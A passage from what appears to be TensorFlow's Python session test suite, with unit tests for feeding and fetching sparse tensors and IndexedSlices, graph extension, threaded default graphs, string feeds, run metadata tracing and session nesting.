sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {sp: (indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape],
{sp: sparse_tensor.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(
sp2, {sp: sparse_tensor.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.dense_shape, shape)
def testFeedSparsePlaceholderConstantShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(dtype=np.float32,
shape=shape,
name='placeholder1')
self.assertAllEqual(sp.dense_shape.eval(session=s), shape)
self.assertAllEqual(tensor_util.constant_value(sp.dense_shape), shape)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {sp: (indices, values)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
def testFetchIndexedSlices(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices),
constant_op.constant(dense_shape))
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlices(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32,
shape=(2,)),
array_ops.placeholder(dtype=np.int64,
shape=(2, 3)),
array_ops.placeholder(dtype=np.int64,
shape=(3,)),)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind_dense_shape = array_ops.identity(ind.dense_shape)
ind2 = ops.IndexedSlices(ind_values, ind_indices, ind_dense_shape)
# Feed with tuple
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape],
{ind: (values, indices, dense_shape)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape],
{ind: ops.IndexedSlicesValue(values, indices, dense_shape)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {ind: ops.IndexedSlicesValue(values, indices,
dense_shape)})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testFetchIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = None
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices), None)
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = None
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32,
shape=(2,)),
array_ops.placeholder(dtype=np.int64,
shape=(2, 3)),
None)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind2 = ops.IndexedSlices(ind_values, ind_indices)
# Feed with tuple
values_out, indices_out = s.run(
[ind_values, ind_indices], {ind: (values, indices)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue
values_out, indices_out = s.run(
[ind_values, ind_indices],
{ind: ops.IndexedSlicesValue(values, indices, dense_shape)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {ind: ops.IndexedSlicesValue(values, indices,
dense_shape)})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testExtendWithStatelessOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
# Extend will happen here.
e_val = s.run(e)
self.assertAllEqual([[24.0]], e_val)
def testExtendWithStatefulOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testExtendWithStatefulOperations_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
# Extend will happen here.
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
def testExtendWithGroupBy(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
p = variables.Variable(a, name='testExtendWithGroupBy_p')
a_val = a.eval() # Force an Extend after this op.
self.assertAllEqual([[1.0, 1.0]], a_val)
b = constant_op.constant(2.0, shape=[1, 2])
q = variables.Variable(b, name='testExtendWithGroupBy_q')
# Extend will happen here.
init = control_flow_ops.group(p.initializer, q.initializer)
s.run(init)
p_val, q_val = s.run([p, q])
self.assertAllEqual([[1.0, 1.0]], p_val)
self.assertAllEqual([[2.0, 2.0]], q_val)
def testTensorGetMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
fed_c_val = c.eval(feed_dict={a.name: [[4.0, 4.0]]})
self.assertAllEqual([[16.0, 16.0, 16.0]], fed_c_val)
def testOperationRunMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 2], name='b')
v = variables.Variable(a, a.dtype)
assign_a_to_v = state_ops.assign(v, a)
assign_a_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[1.0, 1.0]], v_val)
assign_b_to_v = state_ops.assign(v, b)
assign_b_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[2.0, 2.0]], v_val)
assign_b_to_v.eval(feed_dict={'b:0': [[3.0, 3.0]]})
v_val = v.eval()
self.assertAllEqual([[3.0, 3.0]], v_val)
def testDefaultGraph(self):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
self.assertEqual(ops.get_default_graph(), a.graph)
self.assertEqual(ops.get_default_graph(), b.graph)
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testDefaultGraph_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def _testDefaultGraphInThread(self, constructed_event, continue_event, i):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='var_%d' % i)
# Block here until all threads have constructed their graph.
constructed_event.set()
continue_event.wait()
assign_c_to_v = state_ops.assign(v, c)
v.initializer.run()
assign_c_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def testDefaultGraphWithThreads(self):
# Fork ten threads that use their thread-local default graph.
threads = []
constructed_events = [threading.Event() for _ in range(10)]
continue_event = threading.Event()
for i, constructed_event in enumerate(constructed_events):
t = self.checkedThread(target=self._testDefaultGraphInThread,
args=(constructed_event, continue_event, i))
threads.append(t)
for t in threads:
t.start()
for constructed_event in constructed_events:
constructed_event.wait()
continue_event.set()
for t in threads:
t.join()
def testParallelRun(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
ev = threading.Event()
def run_step():
ev.wait()
val = c.eval(session=sess)
self.assertEqual(val, 5.0)
threads = [self.checkedThread(target=run_step) for _ in range(100)]
for t in threads:
t.start()
ev.set()
for t in threads:
t.join()
def testRunFeedDict(self):
with session.Session() as s:
x = array_ops.zeros([2])
y = s.run(2 * x, feed_dict={x: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x.name: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x: [1, 1]})
assert (y == 2 * np.ones(2)).all()
# Test nested tuple keys
z = (((array_ops.zeros([2]),),), array_ops.zeros([2]),
(array_ops.zeros([2]),))
result = [z[0][0][0] * 2, z[1] * 2, z[2][0] * 2]
values = (((np.array([1, 1]),),), np.array([2, 2]), (np.array([3, 3]),))
result_value = s.run(result, feed_dict={z: values})
self.assertAllEqual(result_value[0], 2 * np.ones(2))
self.assertAllEqual(result_value[1], 2 * np.array([2, 2]))
self.assertAllEqual(result_value[2], 2 * np.array([3, 3]))
def testGraphDef(self):
with session.Session() as sess:
self.assertProtoEquals(
'versions { producer: %d min_consumer: %d }' % (
versions.GRAPH_DEF_VERSION,
versions.GRAPH_DEF_VERSION_MIN_CONSUMER),
sess.graph_def)
c = constant_op.constant(5.0, name='c')
self.assertEquals(len(sess.graph_def.node), 1)
d = constant_op.constant(6.0, name='d')
self.assertEquals(len(sess.graph_def.node), 2)
self.assertAllEqual(c.eval(), 5.0)
self.assertAllEqual(d.eval(), 6.0)
e = constant_op.constant(7.0, name='e')
self.assertEquals(len(sess.graph_def.node), 3)
self.assertAllEqual(e.eval(), 7.0)
def testUseAfterClose(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
with self.assertRaisesWithPredicateMatch(
RuntimeError, lambda e: 'Attempted to use a closed Session.' in str(e)):
sess.run(c)
def testUseAfterCloseConcurrent(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
def update_thread():
with self.assertRaisesWithPredicateMatch(
RuntimeError,
lambda e: 'Attempted to use a closed Session.' in str(e)):
while True:
sess.run(c)
t = threading.Thread(target=update_thread)
t.start()
time.sleep(0.1)
sess.close()
t.join()
def testUseEmptyGraph(self):
with session.Session() as sess:
with self.assertRaisesRegexp(RuntimeError, 'The Session graph is empty.'):
sess.run([])
with self.assertRaisesRegexp(RuntimeError, 'The Session graph is empty.'):
sess.run(())
with self.assertRaisesRegexp(RuntimeError, 'The Session graph is empty.'):
sess.run({})
def testNotEntered(self):
# pylint: disable=protected-access
self.assertEqual(ops._default_session_stack.get_default(), None)
# pylint: enable=protected-access
with ops.device('/cpu:0'):
sess = session.Session()
c_1 = constant_op.constant(5.0)
with sess.graph.as_default():
c_2 = constant_op.constant(5.0)
self.assertEqual(c_1.graph, c_2.graph)
self.assertEqual(sess.run(c_2), 5.0)
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: 'No default session is registered.' in str(e)):
c_2.eval()
def testInteractive(self):
with ops.device('/cpu:0'):
sess = session.InteractiveSession()
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
self.assertAllEqual([[4.0, 4.0, 4.0]], c.eval())
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
self.assertAllEqual([[24.0]], e.eval())
sess.close()
def testInteractivePlacePrunedGraph(self):
sess = session.InteractiveSession()
# Build a graph that has a bad op in it (no kernel).
#
# This test currently does not link in any GPU kernels,
# which is why placing this is invalid. If at some point
# GPU kernels are added to this test, some other different
# op / device combo should be chosen.
with ops.device('/gpu:0'):
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(1.0, shape=[1, 2])
# Only run the valid op, this should work.
b.eval()
with self.assertRaises(errors.InvalidArgumentError):
a.eval()
sess.close()
def testDefaultSessionPlacePrunedGraph(self):
sess = session.Session()
# Build a graph that has a bad op in it (no kernel).
#
# This test currently does not link in any GPU kernels,
# which is why placing this is invalid. If at some point
# GPU kernels are added to this test, some other different
# op / device combo should be chosen.
with ops.device('/gpu:0'):
_ = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(1.0, shape=[1, 2])
with self.assertRaises(errors.InvalidArgumentError):
# Even though we don't run the bad op, we place the entire
# graph, which should fail with a non-interactive session.
sess.run(b)
sess.close()
def testSharedGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
with session.Session(graph=g) as sess1:
with session.Session(graph=g) as sess2:
self.assertAllEqual(sess1.run(c), sess2.run(c))
def testDuplicatedInputs(self):
with session.Session() as sess:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 3])
a_val, b_val, a2_val = sess.run([a, b, a])
self.assertAllEqual(a_val, [[1.0, 1.0]])
self.assertAllEqual(b_val, [[2.0, 2.0, 2.0]])
self.assertAllEqual(a2_val, [[1.0, 1.0]])
@test_util.disable_c_api # session.make_callable() doesn't work with C API
def testFeedAndFetch(self):
with session.Session() as sess:
for dtype in [dtypes.float16,
dtypes.float32,
dtypes.float64,
dtypes.int32,
dtypes.uint8,
dtypes.int16,
dtypes.int8,
dtypes.int64,
dtypes.bool,
dtypes.complex64,
dtypes.complex128]:
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
np_dtype = dtype.as_numpy_dtype
feed_t = array_ops.placeholder(dtype=dtype, shape=shape)
out_t = array_ops.identity(feed_t)
np_array = np.random.randint(-10, 10, shape)
if dtype == dtypes.bool:
np_array = np_array > 0
elif dtype == dtypes.complex64:
np_array = np.sqrt(np_array.astype(np_dtype))
          elif dtype == dtypes.complex128:
            np_array = np.sqrt(np_array.astype(np_dtype))
else:
np_array = np_array.astype(np_dtype)
self.assertAllEqual(np_array,
sess.run(out_t, feed_dict={feed_t: np_array}))
# Check that we can also get the feed back.
self.assertAllEqual(np_array,
sess.run(feed_t, feed_dict={feed_t: np_array}))
# Also check that we can get both back.
out_v, feed_v = sess.run([out_t, feed_t],
feed_dict={feed_t: np_array})
self.assertAllEqual(np_array, out_v)
self.assertAllEqual(np_array, feed_v)
feed_fetch_runner = sess.make_callable([out_t, feed_t], [feed_t])
out_v, feed_v = feed_fetch_runner(np_array)
self.assertAllEqual(np_array, out_v)
self.assertAllEqual(np_array, feed_v)
@test_util.disable_c_api # session.make_callable() doesn't work with C API
def testMakeCallableOnTensorWithRunOptions(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
tensor_runner = sess.make_callable(a, accept_options=True)
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
self.assertEqual(0, len(run_metadata.step_stats.dev_stats))
res = tensor_runner(options=run_options, run_metadata=run_metadata)
self.assertEqual(42.0, res)
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
@test_util.disable_c_api # session.make_callable() doesn't work with C API
def testMakeCallableOnOperationWithRunOptions(self):
with session.Session() as sess:
a = variables.Variable(42.0)
b = state_ops.assign_add(a, 1.0)
sess.run(a.initializer)
tensor_runner = sess.make_callable(b.op, accept_options=True)
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
self.assertEqual(0, len(run_metadata.step_stats.dev_stats))
tensor_runner(options=run_options, run_metadata=run_metadata)
self.assertEqual(43.0, sess.run(a))
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
@test_util.disable_c_api # session.make_callable() doesn't work with C API
def testMakeCallableWithFeedListAndRunOptions(self):
with session.Session() as sess:
ph = array_ops.placeholder(dtypes.float32)
a = math_ops.add(ph, 1.0)
tensor_runner = sess.make_callable(
a, feed_list=[ph.name], accept_options=True)
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
self.assertEqual(0, len(run_metadata.step_stats.dev_stats))
self.assertAllClose(
42.0,
tensor_runner(41.0, options=run_options, run_metadata=run_metadata))
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
def testFeedError(self):
with session.Session() as sess:
feed_t = array_ops.placeholder(dtype=dtypes.float32)
out_t = array_ops.identity(feed_t)
feed_val = constant_op.constant(5.0)
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
sess.run(out_t, feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.eval(feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.op.run(feed_dict={feed_t: feed_val})
def testFeedPrecisionLossError(self):
with session.Session() as sess:
largest_int64 = np.iinfo(np.int64).max
feed_int_implicit_int32 = constant_op.constant(1)
feed_int_explicit_int32 = constant_op.constant(1, dtype=dtypes.int32)
out_t = constant_op.constant(1.0)
with self.assertRaisesRegexp(TypeError,
'is not compatible with Tensor type'):
sess.run(out_t, feed_dict={feed_int_implicit_int32: largest_int64})
with self.assertRaisesRegexp(TypeError,
'is not compatible with Tensor type'):
sess.run(out_t, feed_dict={feed_int_explicit_int32: largest_int64})
def testStringFetch(self):
with session.Session():
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array([compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape) if size > 0 else []
c = constant_op.constant(c_list)
self.assertAllEqual(c.eval(), c_list)
def testStringFeed(self):
with session.Session() as sess:
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array([compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape)
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=shape)
c = array_ops.identity(feed_t)
self.assertAllEqual(sess.run(c, feed_dict={feed_t: c_list}), c_list)
self.assertAllEqual(sess.run(feed_t, feed_dict={feed_t: c_list}),
c_list)
c_v, feed_v = sess.run([c, feed_t], feed_dict={feed_t: c_list})
self.assertAllEqual(c_v, c_list)
self.assertAllEqual(feed_v, c_list)
def testStringFeedWithNullCharacters(self):
with session.Session():
c_list = [b'\n\x01\x00', b'\n\x00\x01']
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[2])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
self.assertEqual(c_list[0], out[0])
self.assertEqual(c_list[1], out[1])
def testStringFeedWithUnicode(self):
with session.Session():
c_list = [u'\n\x01\x00', u'\n\x00\x01',
u'\u26a3 unicode', u'\U0001f60e deal with it']
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[len(c_list)])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
for i in range(len(c_list)):
self.assertEqual(c_list[i], out[i].decode('utf-8'))
out = c.eval(feed_dict={feed_t: np.array(c_list, dtype=np.object)})
for i in range(len(c_list)):
self.assertEqual(c_list[i], out[i].decode('utf-8'))
def testInvalidTargetFails(self):
with self.assertRaisesRegexp(
errors.NotFoundError,
'No session factory registered for the given session options'):
session.Session('INVALID_TARGET')
def testFetchByNameDifferentStringTypes(self):
with session.Session() as sess:
c = constant_op.constant(42.0, name='c')
d = constant_op.constant(43.0, name=u'd')
e = constant_op.constant(44.0, name=b'e')
f = constant_op.constant(45.0, name=r'f')
self.assertTrue(isinstance(c.name, six.text_type))
self.assertTrue(isinstance(d.name, six.text_type))
self.assertTrue(isinstance(e.name, six.text_type))
self.assertTrue(isinstance(f.name, six.text_type))
self.assertEqual(42.0, sess.run('c:0'))
self.assertEqual(42.0, sess.run(u'c:0'))
self.assertEqual(42.0, sess.run(b'c:0'))
self.assertEqual(42.0, sess.run(r'c:0'))
self.assertEqual(43.0, sess.run('d:0'))
self.assertEqual(43.0, sess.run(u'd:0'))
self.assertEqual(43.0, sess.run(b'd:0'))
self.assertEqual(43.0, sess.run(r'd:0'))
self.assertEqual(44.0, sess.run('e:0'))
self.assertEqual(44.0, sess.run(u'e:0'))
self.assertEqual(44.0, sess.run(b'e:0'))
self.assertEqual(44.0, sess.run(r'e:0'))
self.assertEqual(45.0, sess.run('f:0'))
self.assertEqual(45.0, sess.run(u'f:0'))
self.assertEqual(45.0, sess.run(b'f:0'))
self.assertEqual(45.0, sess.run(r'f:0'))
def testIncorrectGraph(self):
with ops.Graph().as_default() as g_1:
c_1 = constant_op.constant(1.0, name='c')
with ops.Graph().as_default() as g_2:
c_2 = constant_op.constant(2.0, name='c')
self.assertEqual('c', c_1.op.name)
self.assertEqual('c', c_2.op.name)
with session.Session(graph=g_1) as sess_1:
self.assertEqual(1.0, sess_1.run(c_1))
with self.assertRaises(ValueError):
sess_1.run(c_2)
with self.assertRaises(ValueError):
sess_1.run(c_2.op)
with session.Session(graph=g_2) as sess_2:
with self.assertRaises(ValueError):
sess_2.run(c_1)
with self.assertRaises(ValueError):
sess_2.run(c_1.op)
self.assertEqual(2.0, sess_2.run(c_2))
def testFeedDictKeyException(self):
with session.Session() as sess:
a = constant_op.constant(1.0, dtypes.float32, name='a')
with self.assertRaisesRegexp(TypeError, 'Cannot interpret feed_dict'):
sess.run(a, feed_dict={'a': [2.0]})
def testPerStepTrace(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
with ops.device('/cpu:0'):
with session.Session() as sess:
sess.run(constant_op.constant(1.0))
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0), run_metadata=run_metadata)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0),
options=run_options,
run_metadata=run_metadata)
self.assertTrue(run_metadata.HasField('step_stats'))
self.assertEquals(len(run_metadata.step_stats.dev_stats), 1)
def testRunOptionsRunMetadata(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
with ops.device('/cpu:0'):
with session.Session() as sess:
# all combinations are valid
sess.run(constant_op.constant(1.0), options=None, run_metadata=None)
sess.run(constant_op.constant(1.0), options=None,
run_metadata=run_metadata)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0), options=run_options,
run_metadata=None)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0), options=run_options,
run_metadata=run_metadata)
self.assertTrue(run_metadata.HasField('step_stats'))
        self.assertEqual(len(run_metadata.step_stats.dev_stats), 1)
def testFeedShapeCompatibility(self):
with session.Session() as sess:
some_tensor = constant_op.constant([2.0, 2.0, 2.0, 2.0])
new_shape = constant_op.constant([2, 2])
reshaped_tensor = array_ops.reshape(some_tensor, new_shape)
with self.assertRaisesRegexp(ValueError, 'Cannot feed value of shape'):
sess.run(reshaped_tensor, feed_dict={some_tensor: [1.0, 2.0, 3.0]})
with self.assertRaisesRegexp(ValueError, 'may not be fed'):
sess.run(reshaped_tensor, feed_dict={new_shape: [3, 7]})
def testInferShapesFalse(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant([[1, 2]])
sess = session.Session()
self.assertFalse('_output_shapes' in sess.graph_def.node[0].attr)
# Avoid lint error regarding 'unused' var a.
self.assertTrue(a == a)
def testInferShapesTrue(self):
config = config_pb2.ConfigProto(
graph_options=config_pb2.GraphOptions(infer_shapes=True))
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant([[1, 2]])
sess = session.Session(config=config)
self.assertTrue('_output_shapes' in sess.graph_def.node[0].attr)
# Avoid lint error regarding 'unused' var a.
self.assertTrue(a == a)
def testBuildCostModel(self):
run_options = config_pb2.RunOptions()
config = config_pb2.ConfigProto(
allow_soft_placement=True,
graph_options=config_pb2.GraphOptions(build_cost_model=100))
with session.Session(config=config) as sess:
with ops.device('/gpu:0'):
a = array_ops.placeholder(dtypes.float32, shape=[])
b = math_ops.add(a, a)
c = array_ops.identity(b)
d = math_ops.multiply(c, c)
for step in xrange(120):
run_metadata = config_pb2.RunMetadata()
sess.run(d, feed_dict={a: 1.0},
options=run_options, run_metadata=run_metadata)
if step == 99:
self.assertTrue(run_metadata.HasField('cost_graph'))
else:
self.assertFalse(run_metadata.HasField('cost_graph'))
def runTestOutputPartitionGraphs(self, sess):
run_options = config_pb2.RunOptions(output_partition_graphs=True)
a = constant_op.constant(1)
run_metadata = config_pb2.RunMetadata()
sess.run(a, options=run_options, run_metadata=run_metadata)
self.assertGreater(len(run_metadata.partition_graphs), 0)
sess.run(a, run_metadata=run_metadata)
self.assertEqual(len(run_metadata.partition_graphs), 0)
def testOutputPartitionGraphsDirect(self):
self.runTestOutputPartitionGraphs(session.Session())
def testOutputPartitionGraphsDistributed(self):
server = server_lib.Server.create_local_server()
self.runTestOutputPartitionGraphs(session.Session(server.target))
def testNonInteractiveSessionNesting(self):
sess1 = session.Session()
sess1_controller = sess1.as_default()
sess1_controller.__enter__()
sess2 = session.Session()
sess2_controller = sess2.as_default()
sess2_controller.__enter__()
with self.assertRaisesRegexp(AssertionError, 'Nesting violated'):
sess1_controller.__exit__(None, None, None)
ops._default_session_stack.reset()
def testInteractiveSessionNesting(self):
